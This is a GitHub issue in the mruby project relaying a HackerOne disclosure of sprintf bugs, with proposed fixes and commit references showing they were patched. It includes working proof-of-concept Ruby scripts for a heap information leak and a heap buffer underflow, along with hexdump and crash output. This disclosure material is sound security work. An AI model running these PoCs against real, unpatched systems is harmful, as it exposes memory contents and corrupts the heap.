/mruby

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Bugs in sprintf #3498

Closed
clayton-shopify opened this Issue Mar 10, 2017 · 0 comments

Comments

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
1 participant
@clayton-shopify
@clayton-shopify
Contributor

clayton-shopify commented Mar 10, 2017

https://hackerone.com/aerodudrizzt reported the following issues in sprintf:

Technical Error 1:

The CHECK(l) macro can sometimes receive negative values, that will bypass the size checks, since the resize loop is:

#define CHECK(l) do {\
/*  int cr = ENC_CODERANGE(result);*/\
  while ((l) >= bsiz - blen) {\
    bsiz*=2;\
  }\
  mrb_str_resize(mrb, result, bsiz);\
/*  ENC_CODERANGE_SET(result, cr);*/\
  buf = RSTRING_PTR(result);\
} while (0)

One example for reaching a negative "l" value is in the "G" format when the width is "2 ** 31 - 20", causing need to be MIN_INT:

        if ((flags&FWIDTH) && need < width)
            need = width;
        need += 20;

        CHECK(need);
        n = snprintf(&buf[blen], need, fbuf, fval);
        blen += n;

Proposed Fix:

Since there are several such IOFs, the best fix will be a robust check inside the macro itself.
The macro should add another check to raise an exception in case l < 0.

Technical Error 2:

Still in the "G" format, in case of a huge width, the snprintf call will fail, returning -1:

        n = snprintf(&buf[blen], need, fbuf, fval);
        blen += n;

This means that we can decrement blen by 1 for each such format primitive.

Information Leak PoC Script:

secret_password = "thisismysuperdupersecretpassword"

f = 1234567890.12345678
unique = sprintf("% 2147483628G", f)

sample1 = "1" * 50
sample2 = "2" * 100
sample3 = "3" * 200

print unique.length
print unique

On 32bit machines, the mrb_str_resize(-1) will create a string of length -1 with a data buffer realloced with size 0 (= -1 + 1). The resulting output is:

hexdump sprintf_leak.bin
0000000 312d 0000 0000 0000 0000 0000 0000 0000
0000010 0000 0000 0000 0000 0000 0000 0000 0000
*
0000080 0000 0000 0000 0039 0000 3131 3131 3131
0000090 3131 3131 3131 3131 3131 3131 3131 3131
*
00000b0 3131 3131 3131 3131 3131 3131 0000 0071
00000c0 0000 3232 3232 3232 3232 3232 3232 3232
00000d0 3232 3232 3232 3232 3232 3232 3232 3232
*
0000120 3232 3232 3232 0000 0000 0000 0000 00d1
0000130 0000 3333 3333 3333 3333 3333 3333 3333
0000140 3333 3333 3333 3333 3333 3333 3333 3333
*
00001f0 3333 3333 3333 3333 3333 0000 0000 05c9
0000200 0000 ca20 b76f ca20 b76f ebd8 095d ebd8
0000210 095d 0000 0000 0000 0000 0000 0000 0000
0000220 0000 0000 0000 0000 0000 0000 0000 0000
*
00007c0 0000 05c8 0000 0010 0000 001b 0000 0001
00007d0 0000 e048 095d 0029 0000 6874 7369 7369
00007e0 796d 7573 6570 6472 7075 7265 6573 7263
00007f0 7465 6170 7373 6f77 6472 0000 0000 0021
0000800 0000 0810 0000 e2c0 0959 0000 0000 0020
0000810 0000 e0f0 095d f200 095d 0000 0000 0029
0000820 0000 6874 7369 7369 796d 7573 6570 6472
0000830 7075 7265 6573 7263 7465 6170 7373 6f77
0000840 6472 0000 0000 0019 0000 2025 3132 3734
0000850 3834 3633 3832 0047 0000 0000 0000 0021
0000860 0000 0810 0000 e2c0 0959 0000 0000 000d
0000870 0000 e108 095d f260 095d 0000 0000 0019
0000880 0000 2025 3132 3734 3834 3633 3832 0047
0000890 0000 0000 0000 0021 0000 8010 0001 e2c0
00008a0 0959 0000 0000 0031 0000 0000 0000 0000
00008b0 0000 0000 0000 0021 0000 8010 0001 e2c0
00008c0 0959 0000 0000 0032 0000 0000 0000 0000
00008d0 0000 0000 0000 0021 0000 8010 0001 e2c0
00008e0 0959 0000 0000 0033 0000 0000 0000 0000
00008f0 0000 0000 0000 dd31 0001 0000 0000 0000
0000900 0000 0000 0000 0000 0000 0000 0000 0000
*
0001000

And a close look will tell us that:

  • The print of unique.length returned -1: 0x2d, 0x31
  • Our "secret password" can be found at the last memory block of the dump.

Heap buffer underflow PoC Script:

f = 1234567890.12345678
format = "% 2147483628G" * 10 + "!!!!!!!!!!!"

str1 = "1" * 120
unique = sprintf(format, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f)
print str1

Decrementing blen 10 times, will result in a buffer underflow of 10 bytes, that will write '!' on the str1, as can be seen in the dump:

*** Error in `./mruby': double free or corruption (out): 0x09905b30 ***
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x67257)[0xb7530257]
/lib/i386-linux-gnu/libc.so.6(+0x6d577)[0xb7536577]
/lib/i386-linux-gnu/libc.so.6(+0x6dd31)[0xb7536d31]
./mruby[0x804c81b]
./mruby[0x80593f5]
./mruby[0x8052760]
./mruby[0x805a3a0]
./mruby[0x80596bb]
./mruby[0x80596f8]
./mruby[0x804ce4d]
./mruby[0x8049762]
./mruby[0x8049c48]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb74e1637]
./mruby[0x80491d1]
======= Memory map: ========
08048000-080ed000 r-xp 00000000 08:01 2883651    /XXX/mruby/bin/mruby
080ed000-080ee000 r--p 000a4000 08:01 2883651   /XXX/mruby/bin/mruby
080ee000-080ef000 rw-p 000a5000 08:01 2883651   /XXX/mruby/bin/mruby
098c0000-09924000 rw-p 00000000 00:00 0          [heap]
b7300000-b7321000 rw-p 00000000 00:00 0 
b7321000-b7400000 ---p 00000000 00:00 0 
b7495000-b74b1000 r-xp 00000000 08:01 656726     /lib/i386-linux-gnu/libgcc_s.so.1
b74b1000-b74b2000 rw-p 0001b000 08:01 656726     /lib/i386-linux-gnu/libgcc_s.so.1
b74c8000-b74c9000 rw-p 00000000 00:00 0 
b74c9000-b7678000 r-xp 00000000 08:01 656688     /lib/i386-linux-gnu/libc-2.23.so
b7678000-b7679000 ---p 001af000 08:01 656688     /lib/i386-linux-gnu/libc-2.23.so
b7679000-b767b000 r--p 001af000 08:01 656688     /lib/i386-linux-gnu/libc-2.23.so
b767b000-b767c000 rw-p 001b1000 08:01 656688     /lib/i386-linux-gnu/libc-2.23.so
b767c000-b767f000 rw-p 00000000 00:00 0 
b767f000-b76d2000 r-xp 00000000 08:01 656758     /lib/i386-linux-gnu/libm-2.23.so
b76d2000-b76d3000 r--p 00052000 08:01 656758     /lib/i386-linux-gnu/libm-2.23.so
b76d3000-b76d4000 rw-p 00053000 08:01 656758     /lib/i386-linux-gnu/libm-2.23.so
b76e9000-b76ec000 rw-p 00000000 00:00 0 
b76ec000-b76ee000 r--p 00000000 00:00 0          [vvar]
b76ee000-b76ef000 r-xp 00000000 00:00 0          [vdso]
b76ef000-b7711000 r-xp 00000000 08:01 656660     /lib/i386-linux-gnu/ld-2.23.so
b7711000-b7712000 rw-p 00000000 00:00 0 
b7712000-b7713000 r--p 00022000 08:01 656660     /lib/i386-linux-gnu/ld-2.23.so
b7713000-b7714000 rw-p 00023000 08:01 656660     /lib/i386-linux-gnu/ld-2.23.so
bff43000-bff64000 rw-p 00000000 00:00 0          [stack]
1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111!!Aborted (core dumped)

Proposed Fix:

Should check the return value of snprintf for errors, instead of directly using it by adding it to blen.

matz added a commit that referenced this issue Mar 11, 2017

@matz
Check return value from snprintf(); ref #3498
e392231

matz added a commit that referenced this issue Mar 11, 2017

@matz
fixup! Check return value from snprintf(); ref #3498
f30ec2d

@matz matz closed this in 94395e8 Mar 11, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment